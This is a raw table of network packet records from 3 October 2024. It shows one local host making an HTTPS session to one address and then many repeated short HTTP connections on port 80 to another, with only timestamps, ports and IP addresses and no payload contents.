Oct 3, 2024 09:20:46.088206053 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.088216066 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.088371038 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.090532064 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.090981960 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.137105942 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.137475014 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.140865088 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.140913010 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.140975952 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.140989065 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.141011953 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.181323051 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.214358091 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.214593887 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.215274096 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.215358019 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.215359926 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.215439081 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.232445002 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:48.118127108 CEST	49711	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:48.124433041 CEST	80	49711	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:48.124531031 CEST	49711	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:48.126672029 CEST	49711	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:48.138039112 CEST	80	49711	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:48.138102055 CEST	49711	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:48.151190996 CEST	80	49711	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:49.077418089 CEST	80	49711	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:49.077564955 CEST	49711	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:49.078197956 CEST	80	49711	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:49.078330994 CEST	49711	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:49.087636948 CEST	80	49711	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:49.370779991 CEST	49712	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:49.386743069 CEST	80	49712	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:49.386850119 CEST	49712	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:49.388974905 CEST	49712	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:49.427066088 CEST	80	49712	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:49.427131891 CEST	49712	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:49.449954987 CEST	80	49712	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:50.285749912 CEST	80	49712	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:50.285872936 CEST	49712	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:50.286408901 CEST	80	49712	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:50.286459923 CEST	49712	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:50.290795088 CEST	80	49712	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:50.383428097 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:50.388549089 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:50.388747931 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:50.390712023 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:50.395893097 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:50.395967960 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:50.401247025 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:51.444361925 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:51.444637060 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:51.444808006 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:51.444818974 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:51.444891930 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:51.444891930 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:51.445071936 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:51.445137978 CEST	49713	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:51.449577093 CEST	80	49713	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:52.107420921 CEST	49714	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:52.124651909 CEST	80	49714	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:52.124741077 CEST	49714	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:52.127427101 CEST	49714	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:52.138016939 CEST	80	49714	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:52.138115883 CEST	49714	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:52.143893003 CEST	80	49714	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:52.895509005 CEST	80	49714	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:52.895647049 CEST	49714	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:52.896537066 CEST	80	49714	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:52.896604061 CEST	49714	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:52.900738001 CEST	80	49714	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:53.046730042 CEST	49715	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:53.051878929 CEST	80	49715	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:53.051964998 CEST	49715	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:53.054243088 CEST	49715	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:53.059556007 CEST	80	49715	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:53.059613943 CEST	49715	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:53.064809084 CEST	80	49715	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:55.154339075 CEST	80	49715	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:55.154455900 CEST	80	49715	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:55.154508114 CEST	49715	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:55.154545069 CEST	49715	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:55.160370111 CEST	80	49715	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:55.298652887 CEST	49717	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:55.303873062 CEST	80	49717	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:55.303949118 CEST	49717	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:55.306317091 CEST	49717	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:55.313158035 CEST	80	49717	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:55.313220024 CEST	49717	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:55.318362951 CEST	80	49717	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:56.378058910 CEST	80	49717	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:56.378201008 CEST	49717	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:56.392452955 CEST	80	49717	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:56.392535925 CEST	49717	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:56.531124115 CEST	49718	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:56.537033081 CEST	80	49718	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:56.537166119 CEST	49718	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:56.539355040 CEST	49718	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:56.544472933 CEST	80	49718	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:56.544536114 CEST	49718	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:56.549566984 CEST	80	49718	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:57.546360970 CEST	80	49718	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:57.546571016 CEST	49718	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:57.577390909 CEST	80	49718	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:57.578675985 CEST	49718	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:57.758976936 CEST	55843	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:58.057960033 CEST	80	55843	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:58.058073997 CEST	55843	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:58.060252905 CEST	55843	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:58.316111088 CEST	80	55843	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:58.316168070 CEST	55843	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:58.324692011 CEST	80	55843	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:59.117296934 CEST	80	55843	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:59.117485046 CEST	55843	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:59.117609978 CEST	80	55843	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:59.117671013 CEST	55843	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:59.122929096 CEST	80	55843	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:59.260401011 CEST	64348	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:59.265347958 CEST	80	64348	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:59.265481949 CEST	64348	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:59.267592907 CEST	64348	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:59.272653103 CEST	80	64348	45.149.241.169	192.168.2.11
Oct 3, 2024 09:20:59.272737026 CEST	64348	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:20:59.277841091 CEST	80	64348	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:00.351605892 CEST	80	64348	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:00.355678082 CEST	64348	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:00.361011028 CEST	80	64348	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:00.361129999 CEST	64348	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:00.657367945 CEST	64350	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:00.662729025 CEST	80	64350	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:00.662822008 CEST	64350	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:00.665224075 CEST	64350	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:00.670850992 CEST	80	64350	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:00.670902967 CEST	64350	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:00.677810907 CEST	80	64350	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:01.453564882 CEST	80	64350	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:01.453741074 CEST	80	64350	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:01.453897953 CEST	64350	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:01.453897953 CEST	64350	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:01.459279060 CEST	80	64350	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:01.610229969 CEST	64352	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:01.615058899 CEST	80	64352	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:01.615461111 CEST	64352	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:01.618191004 CEST	64352	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:01.623254061 CEST	80	64352	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:01.623466969 CEST	64352	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:01.628575087 CEST	80	64352	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:02.292433023 CEST	80	64352	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:02.292635918 CEST	64352	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:02.292690039 CEST	80	64352	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:02.292751074 CEST	64352	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:02.297468901 CEST	80	64352	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:02.435652971 CEST	64354	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:02.440912962 CEST	80	64354	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:02.441021919 CEST	64354	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:02.443226099 CEST	64354	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:02.448632002 CEST	80	64354	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:02.448704004 CEST	64354	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:02.453495026 CEST	80	64354	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:03.191437006 CEST	80	64354	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:03.191821098 CEST	80	64354	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:03.191951990 CEST	64354	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:03.196533918 CEST	64354	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:03.202516079 CEST	80	64354	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:03.475652933 CEST	64355	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:03.480690956 CEST	80	64355	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:03.480761051 CEST	64355	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:03.482903957 CEST	64355	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:03.487999916 CEST	80	64355	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:03.488048077 CEST	64355	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:03.493161917 CEST	80	64355	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:04.262743950 CEST	80	64355	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:04.262772083 CEST	80	64355	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:04.262865067 CEST	64355	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:04.262957096 CEST	64355	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:04.268373013 CEST	80	64355	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:04.416018009 CEST	64357	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:04.421169996 CEST	80	64357	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:04.421297073 CEST	64357	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:04.423429966 CEST	64357	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:04.428256035 CEST	80	64357	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:04.428361893 CEST	64357	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:04.433180094 CEST	80	64357	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:05.200607061 CEST	80	64357	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:05.200762987 CEST	64357	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:05.201138020 CEST	80	64357	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:05.201246977 CEST	64357	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:05.205631971 CEST	80	64357	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:05.342603922 CEST	64358	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:05.348911047 CEST	80	64358	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:05.351687908 CEST	64358	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:05.354207039 CEST	64358	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:05.360822916 CEST	80	64358	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:05.363792896 CEST	64358	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:05.370971918 CEST	80	64358	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:06.209109068 CEST	80	64358	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:06.209342003 CEST	64358	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:06.209383011 CEST	80	64358	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:06.209439039 CEST	64358	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:06.216903925 CEST	80	64358	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:06.372730017 CEST	64359	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:06.378586054 CEST	80	64359	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:06.378793001 CEST	64359	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:06.380893946 CEST	64359	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:06.386023998 CEST	80	64359	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:06.386274099 CEST	64359	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:06.391282082 CEST	80	64359	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:07.095535040 CEST	80	64359	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:07.095755100 CEST	64359	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:07.096066952 CEST	80	64359	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:07.096124887 CEST	64359	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:07.101686954 CEST	80	64359	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:07.250000000 CEST	64360	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:07.255400896 CEST	80	64360	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:07.255842924 CEST	64360	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:07.258128881 CEST	64360	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:07.265115976 CEST	80	64360	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:07.265208006 CEST	64360	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:07.273240089 CEST	80	64360	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.057806969 CEST	80	64360	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.057863951 CEST	80	64360	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.058000088 CEST	64360	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.058067083 CEST	64360	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.062889099 CEST	80	64360	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.212765932 CEST	64361	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.217818975 CEST	80	64361	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.217895031 CEST	64361	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.219978094 CEST	64361	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.224898100 CEST	80	64361	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.224948883 CEST	64361	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.230029106 CEST	80	64361	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.908827066 CEST	80	64361	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.908874989 CEST	80	64361	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:08.908970118 CEST	64361	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.914026976 CEST	64361	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:08.918941021 CEST	80	64361	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.160537004 CEST	64362	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.165386915 CEST	80	64362	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.165496111 CEST	64362	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.167659998 CEST	64362	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.172564983 CEST	80	64362	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.172629118 CEST	64362	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.177422047 CEST	80	64362	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.839379072 CEST	80	64362	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.839438915 CEST	80	64362	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.839582920 CEST	64362	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.839634895 CEST	64362	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.844424009 CEST	80	64362	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.983649015 CEST	64363	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.989329100 CEST	80	64363	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.989458084 CEST	64363	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.991626978 CEST	64363	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:09.997446060 CEST	80	64363	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:09.997520924 CEST	64363	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:10.002466917 CEST	80	64363	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:10.836468935 CEST	80	64363	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:10.836563110 CEST	80	64363	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:10.836642027 CEST	64363	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:10.837057114 CEST	64363	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:10.841978073 CEST	80	64363	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:10.984106064 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:10.989195108 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:10.989339113 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:10.991457939 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:10.996373892 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:10.996788025 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:11.001732111 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:11.917808056 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:11.917861938 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:11.917887926 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:11.918001890 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:11.918284893 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:11.918330908 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:11.921417952 CEST	64364	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:11.926165104 CEST	80	64364	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:12.100244045 CEST	64365	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:12.105030060 CEST	80	64365	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:12.105155945 CEST	64365	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:12.107372999 CEST	64365	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:12.112209082 CEST	80	64365	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:12.112320900 CEST	64365	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:12.117145061 CEST	80	64365	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:12.880244970 CEST	80	64365	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:12.880259991 CEST	80	64365	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:12.880481005 CEST	64365	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:12.880548000 CEST	64365	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:12.885827065 CEST	80	64365	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.035780907 CEST	64366	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.044430971 CEST	80	64366	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.044519901 CEST	64366	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.046875954 CEST	64366	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.055427074 CEST	80	64366	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.055507898 CEST	64366	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.064030886 CEST	80	64366	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.766148090 CEST	80	64366	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.766297102 CEST	80	64366	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.766336918 CEST	64366	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.766391993 CEST	64366	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.771289110 CEST	80	64366	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.903770924 CEST	64367	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.908863068 CEST	80	64367	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.908951998 CEST	64367	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.911133051 CEST	64367	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.916779041 CEST	80	64367	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:13.916853905 CEST	64367	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:13.921673059 CEST	80	64367	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:14.575090885 CEST	80	64367	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:14.575146914 CEST	80	64367	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:14.575323105 CEST	64367	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:14.601238966 CEST	64367	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:14.606298923 CEST	80	64367	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:14.869189978 CEST	64368	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:14.874142885 CEST	80	64368	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:14.874232054 CEST	64368	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:14.876427889 CEST	64368	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:14.881191015 CEST	80	64368	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:14.881237984 CEST	64368	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:14.886039019 CEST	80	64368	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:15.898722887 CEST	80	64368	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:15.899147034 CEST	64368	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:15.904499054 CEST	80	64368	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:15.904602051 CEST	64368	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:16.047513962 CEST	64369	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:16.052357912 CEST	80	64369	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:16.052450895 CEST	64369	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:16.055149078 CEST	64369	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:16.059921980 CEST	80	64369	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:16.059968948 CEST	64369	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:16.064852953 CEST	80	64369	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:16.915457964 CEST	80	64369	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:16.915505886 CEST	80	64369	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:16.915648937 CEST	64369	80	192.168.2.11	45.149.241.169
